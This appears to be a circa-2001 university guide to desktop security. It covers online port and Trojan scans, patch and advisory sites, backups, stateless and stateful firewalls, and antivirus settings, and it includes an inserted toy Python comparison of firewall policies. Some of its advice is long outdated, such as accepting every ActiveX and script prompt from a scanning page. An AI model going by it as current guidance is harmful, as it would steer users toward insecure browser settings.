Security Warning Do you want to install and run "Microsoft Personal Security Advisor" signed on 9/27/2001 4:19 PM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
Security Warning Do you want to install and run "MSSecure XML File" signed on 10/2/2001 1:02AM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
The scans are primarily useful for determining whether your machine is currently harboring a known Trojan Horse, and whether your Norton Anti-virus product is properly installed with up-to-date virus definitions.
The Network Vulnerability scan is, in part, an attempt to convince you to purchase a personal firewall product. See Section 8.6 for comments on personal firewalls. The scan works by attempting to establish connections from the scanning server to ports on your workstation, and reports which ports (i.e., services or Trojans) are currently reachable from the Internet.
WARNING: If you are behind a firewall these port scans may appear to be an attack to your system administrator. Do not run these scans unless you know that it is safe to do so.
NOTE: The fact that a port often used by a Trojan is accessible does not necessarily mean that a Trojan is running on your machine. All ports have legitimate uses. The Internet Assigned Numbers Authority (IANA) publishes a list of the services assigned to each port number at http://www.iana.org/assignments/port-numbers.
When executing the scan for the first time you are prompted to accept an executable file to be executed on your machine.
Security Warning Do you want to install and run "Symantec Security Check Utilities" signed on 5/10/2001 7:08pm and distributed by "Symantec Corporation".
Select "yes" but do not check "Always trust content from Symantec Corporation".
You may be asked several times whether it is okay to run ActiveX controls and scripts; say "yes" to each question asked from this page.
http://www.microsoft.com/technet/security/tools/urlscan.asp
http://windowsupdate.microsoft.com
http://office.microsoft.com/productupdates
http://www.microsoft.com/security/
In addition, the Microsoft Security site provides a query engine which can be used to produce a list of all updates released for a given version of an operating system or application (sorted by month of issuance.)
http://www.microsoft.com/technet/security/current.asp
http://www.ntbugtraq.com
http://www.sarc.com/ http://www.symantec.com/avcenter/
http://www.cert.org/The CERT web site contains information on a wide variety of topics associated with computer security.
It does not matter whether you back up your data to a tape drive, a removable disk (zip, jaz, ...), or to a remote network-based back-up service. What is important is that your data be backed up on a regular basis, so that if your computer were lost tomorrow, or if you needed to reformat your hard disk, you would not be in a state of panic.
Need to find a reference to an online article on backup procedures
Firewall software can be either stateful or stateless. A stateless firewall can only apply access policies to connections to/from specific IP address ranges and/or specific ports, judging each packet on its own. Stateful firewalls have a detailed understanding of the networking protocols used by each network service and keep track of the connections in progress. They can use this information to apply access policies based upon the content and context of the communication, and not just on who is communicating.
As an example, the personal firewall software ZoneAlarm has a MailSafe option that disables .vbs scripts in e-mail (POP/IMAP) by 'quarantining' them under a '.zlx' extension (where the final character varies). If the user tries to open such an attachment, he/she has to go through ZoneAlarm and explicitly state that the attachment from that specific e-mail message should be allowed.
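A toy comparison of the two policy styles, as an added example that is not part of the original document: a stateless rule that must admit any inbound packet from remote port 80 in order to let web replies through, next to a stateful filter that admits only replies to connections the workstation itself opened. All addresses and ports are constructed.

```python
# Added example (not from the original document): stateless vs. stateful filtering.
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    direction: str    # "out" = leaving the workstation, "in" = arriving at it
    syn: bool = False  # True for a TCP connection-opening packet


WORKSTATION = "10.0.0.5"  # constructed address of the protected host


def stateless_allow(pkt: Packet) -> bool:
    """Stateless policy: look only at this packet's own addresses and ports.

    To let replies from web servers back in, the rule has to permit every
    inbound packet whose source port is 80, whether or not this host ever
    asked for it. An unsolicited probe sourced from port 80 passes too."""
    if pkt.direction == "out":
        return True
    return pkt.src_port == 80


class StatefulFilter:
    """Stateful policy: remember connections the workstation opened and admit
    an inbound packet only if it belongs to one of them."""

    def __init__(self) -> None:
        self.established: set[tuple[int, str, int]] = set()

    def allow(self, pkt: Packet) -> bool:
        if pkt.direction == "out":
            # Record (local port, remote ip, remote port) for the new connection.
            self.established.add((pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return True
        key = (pkt.dst_port, pkt.src_ip, pkt.src_port)
        # A connection-opening packet from outside never matches a known flow.
        return key in self.established and not pkt.syn


# Constructed traffic: a web request, its genuine reply, and an unsolicited
# probe that spoofs source port 80 to slip past the stateless rule.
REQUEST = Packet(WORKSTATION, 1025, "192.0.2.10", 80, "out", syn=True)
REPLY = Packet("192.0.2.10", 80, WORKSTATION, 1025, "in")
PROBE = Packet("198.51.100.7", 80, WORKSTATION, 1025, "in", syn=True)


def run_scenario() -> dict:
    """Return each policy's verdict on the reply and on the probe."""
    stateful = StatefulFilter()
    stateful.allow(REQUEST)  # the workstation opens the connection first
    return {
        "stateless": (stateless_allow(REPLY), stateless_allow(PROBE)),
        "stateful": (stateful.allow(REPLY), stateful.allow(PROBE)),
    }
```

The stateless rule lets both the reply and the probe in; the stateful filter admits only the reply, which is why a port that looks "open" to a scanner behind a stateless policy may still be unreachable behind a stateful one.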
It is important to note that firewalls are not the answer to all security concerns. Blocking all connections to specific ports can break required applications. It can be a very complicated and time consuming process to develop the appropriate set of access policies for your computer. Many application errors that appear to be network related can be traced back to firewall access policies which block required access. Unfortunately, from the standpoint of the application, the failure is a network error as it does not know anything about the presence of the firewall.
http://www.columbia.edu/acis/software/nav/
It is important that after installation the Anti-Virus software be configured and regularly updated with the latest virus definition files in order for the software's effectiveness to be maintained. The Anti-virus options
Manual scans should be configured to check all boot records on all drives as well as to scan all files, including files inside compressed archives (.ZIP, .CAB, ...). The only files that should be excluded are database files, since there can be incompatibilities between Microsoft Access or Microsoft SQL Server and anti-virus software.
If you are running Microsoft Office 2000 (or Office XP) the Office 2000 plug-in support should be enabled.
Manual scans of the computer should be scheduled at least once a week.
AcIS' Schuyler has put together a nice user-level description of how to configure e-mail clients to safely read e-mail in conjunction with NAV.
http://www.columbia.edu/acis/email/topics/safeattachments.html
Microsoft products are used on the overwhelming majority of computers on this planet. Microsoft is a monopoly. Microsoft is an American company. The products have their fair share of vulnerabilities and the cost of ownership is so high that it is difficult even on a good day to keep up with the patches. Therefore, Microsoft products have become a more tempting target as each day goes by.
As virus/worm authors have only a finite amount of resources, they spend their time attacking the systems that are most likely to allow them to cause the greatest havoc. At the moment these are the products of Microsoft. It is in the best interest of each of us to consider whether or not we should continue using products that have such a high incident rate of attacks. This is exactly the same analysis we would use to determine where to go on vacation: do we head for the mystical land where people are being killed every day, or the quiet beach community half a world away?
This section attempts to provide some alternatives that might be considered if you believe that the total cost of using Windows and Microsoft Applications is higher than you can bear.